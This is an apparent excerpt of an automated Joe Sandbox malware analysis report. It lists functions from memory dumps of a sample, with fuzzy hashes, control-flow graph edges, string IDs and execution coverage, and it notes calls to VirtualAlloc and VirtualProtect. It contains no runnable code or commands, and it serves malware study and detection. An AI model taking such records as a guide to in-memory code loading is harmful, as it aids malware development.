                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction ID: 2fe10b8190f5e11987dd24e8556101684c36d228d2232d488904178f5beb7b5a
                                                                                                                            • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                            • Instruction Fuzzy Hash: FEC08C3451280C8FC908EB28C88490433A0FB09210BC20090E008C7270D219DCC0C780
                                                                                                                            Function 00007FFD9B794960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6722a486cab5d44def3e1eef75c019d3f87277f7aeee71be52936e91ff362a2e
                                                                                                                            • Instruction ID: 91cffc23a37220ac1f112b5455d4db18e1ef83a400bab46a4d48eb5160cbd3c6
                                                                                                                            • Opcode Fuzzy Hash: 6722a486cab5d44def3e1eef75c019d3f87277f7aeee71be52936e91ff362a2e
                                                                                                                            • Instruction Fuzzy Hash: E7C08C00F1DD1A16F7596204443063E04025B80208F8103B0E41F833CECD0C1E0282CB
                                                                                                                            Function 00007FFD9B7906C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction ID: 80871d5b58a732204be1bca022dbeed1461deafe183ddbe80d3328c4af60c243
                                                                                                                            • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                            • Instruction Fuzzy Hash: 59B01200D6750F00E42431FA089206570405B44510FC20370D80C801B1984D12D40242

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7909B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: 19142e8295893acef501ac44dc5be6721e7825253b2a09fc1f6f812dc3f548ba
                                                                                                                            • Instruction ID: 33f2ba5d1ac95720ecdc46992719b14874fe81196a986945064485142eb04683
                                                                                                                            • Opcode Fuzzy Hash: 19142e8295893acef501ac44dc5be6721e7825253b2a09fc1f6f812dc3f548ba
                                                                                                                            • Instruction Fuzzy Hash: 5741E30BB9D56709E31A33FC75228FC6B46DFA1375B4843B3F05E890EB4E08608686E5

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:6
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 20263 7ffd9b77c491 20264 7ffd9b77c49f VirtualAlloc 20263->20264 20266 7ffd9b77c554 20264->20266 20267 7ffd9b77b4ba 20268 7ffd9b77b4c9 VirtualProtect 20267->20268 20270 7ffd9b77b5ae 20268->20270

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B770D48 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 208 7ffd9b770d48-7ffd9b770d9b call 7ffd9b7707d0 211 7ffd9b770da0-7ffd9b770e41 208->211 221 7ffd9b770e52-7ffd9b770e71 211->221 222 7ffd9b770e59-7ffd9b770e71 211->222 225 7ffd9b770e73-7ffd9b770eb9 221->225 222->225 225->221 229 7ffd9b770ebb-7ffd9b770f05 225->229 233 7ffd9b770f1e 229->233 234 7ffd9b770f07-7ffd9b770f1d 229->234 235 7ffd9b770f1f-7ffd9b771050 233->235 234->235
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5Z_H
                                                                                                                            • API String ID: 0-3267294416
                                                                                                                            • Opcode ID: 14297b075977fe1e07dec8767358e96ad08464b0566c3274009445fb70c6d236
                                                                                                                            • Instruction ID: e2845d580b86ee59b1919ee6d4105570e9fe007296aecdb1e224d5ee0c96ef20
                                                                                                                            • Opcode Fuzzy Hash: 14297b075977fe1e07dec8767358e96ad08464b0566c3274009445fb70c6d236
                                                                                                                            • Instruction Fuzzy Hash: 4791D375A1DB998FEB59DF6C88657E97FE1FB55300F4002BED049C72E2DAB814108740
                                                                                                                            Function 00007FFD9B77B4BA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 137memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B777000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B777000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b777000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: UAWA
                                                                                                                            • API String ID: 544645111-1492024814
                                                                                                                            • Opcode ID: 91c9f180a1994ce12f3613c94d9f4b8ebeb7feefa69bcce3162a1bf65000644e
                                                                                                                            • Instruction ID: 737103a8173254b42efbf380a25f205ef0f8f5114f84247a0bafe6dfda09c7d0
                                                                                                                            • Opcode Fuzzy Hash: 91c9f180a1994ce12f3613c94d9f4b8ebeb7feefa69bcce3162a1bf65000644e
                                                                                                                            • Instruction Fuzzy Hash: 78412D31A0C7894FDB199BA898566E97FE0EF56321F0443AFD099D3293CF746406C792
                                                                                                                            Function 00007FFD9B781752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 11 7ffd9b781752 12 7ffd9b781757-7ffd9b78177d 11->12 15 7ffd9b781783-7ffd9b7817ae 12->15 16 7ffd9b7818d1-7ffd9b7818fb 12->16 28 7ffd9b7817b0-7ffd9b7817ba 15->28 29 7ffd9b7817bd-7ffd9b781845 15->29 21 7ffd9b7818fd-7ffd9b78191a 16->21 22 7ffd9b781947-7ffd9b78194a 16->22 25 7ffd9b781920-7ffd9b781945 21->25 26 7ffd9b781a8b-7ffd9b781a93 21->26 27 7ffd9b781951-7ffd9b781958 22->27 25->22 36 7ffd9b781a94-7ffd9b781a99 26->36 30 7ffd9b78195a-7ffd9b781967 27->30 28->29 61 7ffd9b78188c-7ffd9b78188f 29->61 62 7ffd9b781847-7ffd9b78188a 29->62 35 7ffd9b78196e-7ffd9b781986 30->35 47 7ffd9b781a2c-7ffd9b781a42 35->47 48 7ffd9b78198c-7ffd9b7819df 35->48 38 7ffd9b781a9b-7ffd9b781aaf 36->38 39 7ffd9b781a47-7ffd9b781a62 36->39 44 7ffd9b781c4d-7ffd9b781c4e 38->44 56 7ffd9b781a69-7ffd9b781a84 39->56 45 7ffd9b781c55-7ffd9b781c61 44->45 46 7ffd9b781c50 call 7ffd9b782918 44->46 46->45 47->44 48->56 70 7ffd9b7819e5-7ffd9b7819f0 48->70 56->26 64 7ffd9b7818a4-7ffd9b7818a5 61->64 65 7ffd9b781891-7ffd9b7818a2 61->65 69 7ffd9b7818b1-7ffd9b7818cb 62->69 64->69 65->69 69->15 69->16 72 7ffd9b780f9d-7ffd9b780fdc 70->72 73 7ffd9b7819f6-7ffd9b781a00 70->73 84 7ffd9b780fde-7ffd9b781149 72->84 73->36 75 7ffd9b781a06-7ffd9b781a26 73->75 75->47 75->48 109 7ffd9b78114b-7ffd9b781154 84->109 110 7ffd9b781178-7ffd9b7811b9 84->110 111 7ffd9b78115a-7ffd9b78116a 109->111 112 7ffd9b781699-7ffd9b7816cf 109->112 124 7ffd9b7811ce-7ffd9b781243 110->124 125 7ffd9b7811bb-7ffd9b7811cd 110->125 116 7ffd9b781170-7ffd9b781174 111->116 122 7ffd9b7816d1-7ffd9b781710 112->122 123 7ffd9b781748-7ffd9b781751 112->123 116->110 134 7ffd9b781712-7ffd9b781715 122->134 135 7ffd9b78172a-7ffd9b781746 122->135 123->11 140 7ffd9b781274-7ffd9b7812c3 124->140 141 7ffd9b781245-7ffd9b78126e 124->141 125->124 134->135 136 7ffd9b781717-7ffd9b781727 134->136 135->122 135->123 136->135 149 7ffd9b7812cf-7ffd9b781307 140->149 150 7ffd9b7812c5-7ffd9b7812ca 140->150 141->140 155 7ffd9b781313-7ffd9b78134b 149->155 156 7ffd9b781309-7ffd9b78130e 149->156 151 7ffd9b781683-7ffd9b781693 150->151 151->112 151->116 160 7ffd9b78134d-7ffd9b781352 155->160 161 7ffd9b781357-7ffd9b78138f 155->161 156->151 160->151 165 7ffd9b781391-7ffd9b781396 161->165 166 7ffd9b78139b-7ffd9b7813d3 161->166 165->151 170 7ffd9b7813df-7ffd9b781417 166->170 171 7ffd9b7813d5-7ffd9b7813da 166->171 175 7ffd9b781423-7ffd9b78145b 170->175 176 7ffd9b781419-7ffd9b78141e 170->176 171->151 180 7ffd9b78145d-7ffd9b781462 175->180 181 7ffd9b781467-7ffd9b78149f 175->181 176->151 180->151 185 7ffd9b7814a1-7ffd9b7814a6 181->185 186 7ffd9b7814ab-7ffd9b7814e3 181->186 185->151 190 7ffd9b7814ef-7ffd9b781527 186->190 191 7ffd9b7814e5-7ffd9b7814ea 186->191 195 7ffd9b781533-7ffd9b78156b 190->195 196 7ffd9b781529-7ffd9b78152e 190->196 191->151 200 7ffd9b78156d-7ffd9b781572 195->200 201 7ffd9b781577-7ffd9b7815af 195->201 196->151 200->151 205 7ffd9b7815b1-7ffd9b7815b6 201->205 206 7ffd9b7815bb-7ffd9b7815c4 201->206 205->151 206->151
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b780000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M_H
                                                                                                                            • API String ID: 0-1939843538
                                                                                                                            • Opcode ID: 574df925cb3575b9a033117a279826a4aa8e9c63000e87b3e331f19acad9884a
                                                                                                                            • Instruction ID: e1a9912eb5a0a270a465abd591d4c332216bb4391f8c9b181daf60cc077c0de7
                                                                                                                            • Opcode Fuzzy Hash: 574df925cb3575b9a033117a279826a4aa8e9c63000e87b3e331f19acad9884a
                                                                                                                            • Instruction Fuzzy Hash: 6662A421B19E0E4FE7A8EB6C84A56B87392FF98341F0506B9D44EC76F2DD346D818B41
                                                                                                                            Function 00007FFD9B77C491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 244 7ffd9b77c491-7ffd9b77c49d 245 7ffd9b77c4a1-7ffd9b77c4dd 244->245 246 7ffd9b77c49f 244->246 247 7ffd9b77c4e1-7ffd9b77c552 VirtualAlloc 245->247 246->245 246->247 250 7ffd9b77c554 247->250 251 7ffd9b77c55a-7ffd9b77c582 247->251 250->251
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B777000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B777000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b777000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 75afd82c597a16a5e05320543eda0b11649b37fc621f1ac55ec38b919792a24d
                                                                                                                            • Instruction ID: a0e4e7a1d933bc5c5f3376915c5ab2926d31601d716f7fd47c2e9801d264df6c
                                                                                                                            • Opcode Fuzzy Hash: 75afd82c597a16a5e05320543eda0b11649b37fc621f1ac55ec38b919792a24d
                                                                                                                            • Instruction Fuzzy Hash: BD313C31A0CB4C4FDB1DAB6898566F97BF0EF9A321F04426FE04AC3153DA646815C781
                                                                                                                            Function 00007FFD9B7AA529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 253 7ffd9b7aa529-7ffd9b7aa53d 254 7ffd9b7aa53f-7ffd9b7aa55a 253->254 255 7ffd9b7aa55e-7ffd9b7aa563 254->255
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b7a1000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: a93d2a248ea0654378756a9141250200c30c0adf332f666a415f47f781cf5e95
                                                                                                                            • Instruction ID: 6931bf5223a78d7b570b726fab5cc590d3e02653aec87cace6b8d6fcd26d403c
                                                                                                                            • Opcode Fuzzy Hash: a93d2a248ea0654378756a9141250200c30c0adf332f666a415f47f781cf5e95
                                                                                                                            • Instruction Fuzzy Hash: DDE0656160E7C44FC71AD6744869454BFA0EF6721174A42EEC045CF1A7EA1D8885CB01
                                                                                                                            Function 00007FFD9B7993E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 256 7ffd9b7993e9-7ffd9b799414 258 7ffd9b799418-7ffd9b79941d 256->258
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b793000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 125b5bc173154e6d4a94e4e80b73751d94c7972a0a5d355a41492f35a1e5dcb1
                                                                                                                            • Instruction ID: cc30c23fc4e547a2946316859384af3fa3b7be558d339d2a5eead1ba0bbc7c11
                                                                                                                            • Opcode Fuzzy Hash: 125b5bc173154e6d4a94e4e80b73751d94c7972a0a5d355a41492f35a1e5dcb1
                                                                                                                            • Instruction Fuzzy Hash: 2AE0E56154E7C48FDB56EA74886A8547FA0AF6B21078A41EEC089CB1B3E6299849C701
                                                                                                                            Function 00007FFD9B799599 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 259 7ffd9b799599-7ffd9b7995c4 260 7ffd9b7995c8-7ffd9b7995cd 259->260
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b793000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 9f04dc6ddcf9306befead4eb45ac78a9e3efd481051b3d51e923b5a525de626b
                                                                                                                            • Instruction ID: 2decf7cdf0b6a8137ceb2c839a535a4f2329786d650a15ff47397300a79bba6b
                                                                                                                            • Opcode Fuzzy Hash: 9f04dc6ddcf9306befead4eb45ac78a9e3efd481051b3d51e923b5a525de626b
                                                                                                                            • Instruction Fuzzy Hash: 78E04F7154A3C04FCB16EB7488A98457FB0EE6721078B41DEC04ACB1B3E62DD949CB01
                                                                                                                            Function 00007FFD9B7A1AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 261 7ffd9b7a1ad9-7ffd9b7a1aed 262 7ffd9b7a1aef-7ffd9b7a1b04 261->262 263 7ffd9b7a1b08-7ffd9b7a1b0d 262->263
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b7a1000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: ca249ac62d4b0a9b106ef4829e80241cf880ff62619d6a86180e9d838983c85e
                                                                                                                            • Instruction ID: f0e4966808ee54329ee4507175720b8a9c8ec9678878fcb04f4e1cf098b38544
                                                                                                                            • Opcode Fuzzy Hash: ca249ac62d4b0a9b106ef4829e80241cf880ff62619d6a86180e9d838983c85e
                                                                                                                            • Instruction Fuzzy Hash: 9AE01A6154F7C48FCB56EB7488698457FA0EE6B21078B41EEC089CF1B3E62D8849CB01
                                                                                                                            Function 00007FFD9B7A7E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 264 7ffd9b7a7e19-7ffd9b7a7e44 266 7ffd9b7a7e48-7ffd9b7a7e4d 264->266
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b7a1000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 05e2efae1749ebba7e531536ad54cce18b74356b03b21bc989c0cfa8ad1ca45b
                                                                                                                            • Instruction ID: 785abcc5c99e01c55f1b19db252c98afe54485a7caf5d8705288beafd40f4f84
                                                                                                                            • Opcode Fuzzy Hash: 05e2efae1749ebba7e531536ad54cce18b74356b03b21bc989c0cfa8ad1ca45b
                                                                                                                            • Instruction Fuzzy Hash: A1E01A6154F7C44FCB56EB7488698447FA1AE6B21078B41EEC185CF1B3E62D9849C701
                                                                                                                            Function 00007FFD9B7995D1 Relevance: .3, Instructions: 313COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 649 7ffd9b7995d1-7ffd9b799619 650 7ffd9b79961f-7ffd9b7996ab 649->650 651 7ffd9b7996b2-7ffd9b7996b9 649->651 650->651 653 7ffd9b7996bf-7ffd9b799706 651->653 654 7ffd9b799741-7ffd9b799756 651->654 660 7ffd9b79970d-7ffd9b799735 653->660 655 7ffd9b799758 654->655 656 7ffd9b79975d-7ffd9b79978b 654->656 655->656 665 7ffd9b79978d-7ffd9b799792 656->665 666 7ffd9b7997f1-7ffd9b79980f 656->666 682 7ffd9b7998dc-7ffd9b799923 660->682 683 7ffd9b79973b 660->683 667 7ffd9b799794-7ffd9b799799 665->667 668 7ffd9b7997a3-7ffd9b7997a7 665->668 672 7ffd9b7997a8 666->672 679 7ffd9b799811-7ffd9b7998a7 666->679 667->668 668->672 674 7ffd9b7997aa 672->674 675 7ffd9b7997b2-7ffd9b7997b3 672->675 680 7ffd9b7997ac-7ffd9b7997af 674->680 681 7ffd9b7997eb-7ffd9b7997f0 674->681 675->666 678 7ffd9b7997b5-7ffd9b7997c0 675->678 686 7ffd9b7997c2-7ffd9b7997c7 678->686 687 7ffd9b7997d1-7ffd9b7997d8 678->687 693 7ffd9b7998ab-7ffd9b7998db call 7ffd9b799924 679->693 680->675 681->666 683->654 686->687 687->681 688 7ffd9b7997da-7ffd9b7997e6 687->688 688->693
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b793000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 766941b100448d3517df80b20a8a48642befe4b037e99973a9d3d81f73bcea82
                                                                                                                            • Instruction ID: 5afadc6e4254fe6c43ee554a216a228c8756b702c17ca58aa5141215da83e293
                                                                                                                            • Opcode Fuzzy Hash: 766941b100448d3517df80b20a8a48642befe4b037e99973a9d3d81f73bcea82
                                                                                                                            • Instruction Fuzzy Hash: 6BA18330B19A4D8FEB58EF68C4A5AB977E1FF58304B510679E01EC72E6DE34A841CB41
                                                                                                                            Function 00007FFD9B7A317D Relevance: .3, Instructions: 287COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b7a1000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f19ba8eed3f4f790dd1105db8a29b8087cc0c4a6d29a1932633f7076632787ca
                                                                                                                            • Instruction ID: 9af7844d9872c5557f47694c490395911b7a0527a61ad3695cd7ca92d0375144
                                                                                                                            • Opcode Fuzzy Hash: f19ba8eed3f4f790dd1105db8a29b8087cc0c4a6d29a1932633f7076632787ca
                                                                                                                            • Instruction Fuzzy Hash: A491F521B1DA4E0FEBD8EE6884766B972C2EF94340F0542BAE40DC72E7DD2879458781
                                                                                                                            Function 00007FFD9B7A2111 Relevance: .1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b7a1000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 478ffced5b53988ac1a0f025d8ad83d3fecae5c14e7415685d7cf8aeb0cb68a3
                                                                                                                            • Instruction ID: 8cd13e0a6b5e075a2ef271cc05d110bd7aba8e641910b6e0dac235b76e2e34fa
                                                                                                                            • Opcode Fuzzy Hash: 478ffced5b53988ac1a0f025d8ad83d3fecae5c14e7415685d7cf8aeb0cb68a3
                                                                                                                            • Instruction Fuzzy Hash: 45313831A0D64D8FE769DB58C8647F93791EB95310F0602BED40AC72E2DA686D41CB81
                                                                                                                            Function 00007FFD9B77116D Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b1e255a2eda8b4650e53781d94c4db8d792510eed2510738933479d33553ad3f
                                                                                                                            • Instruction ID: 6532f53361ca9ebd6b3db37528572f5cd7619eb3234416f28f8bdec2e7ec2dbb
                                                                                                                            • Opcode Fuzzy Hash: b1e255a2eda8b4650e53781d94c4db8d792510eed2510738933479d33553ad3f
                                                                                                                            • Instruction Fuzzy Hash: 4D31A730A1964D8FDB44EB68C8A4AB977F0FF69300F0502BAC009DB1B2DF34A940CB50
                                                                                                                            Function 00007FFD9B7AD621 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b7a1000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ee5b030917c18936d5ee6a1e6c26170e5105e7d2e00d136a56e0f9c0201cf586
                                                                                                                            • Instruction ID: a3425a9dee492d1a3cd2ecac3ea370e1a44ec912b07e4729cf28218311c2526d
                                                                                                                            • Opcode Fuzzy Hash: ee5b030917c18936d5ee6a1e6c26170e5105e7d2e00d136a56e0f9c0201cf586
                                                                                                                            • Instruction Fuzzy Hash: EC21D331F0965D8FEBA8DA6898243E977E1EB58310F0506B7D019D71E5DE38AE4187C0
                                                                                                                            Function 00007FFD9B770C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 66acbdfa29e259dc479f8b128244f3393379f8680fb77eda9ee1d0b25a72248f
                                                                                                                            • Instruction ID: 2975ada1e1f6c54c3359bbf30bc1f58d345ba2193e935e826e06f3674e3176b6
                                                                                                                            • Opcode Fuzzy Hash: 66acbdfa29e259dc479f8b128244f3393379f8680fb77eda9ee1d0b25a72248f
                                                                                                                            • Instruction Fuzzy Hash: B721F936B0D75D8FEB22A7A89C650EC7B60EF42325F1542F7D148CB1E3D97826468781
                                                                                                                            Function 00007FFD9B7A185D Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
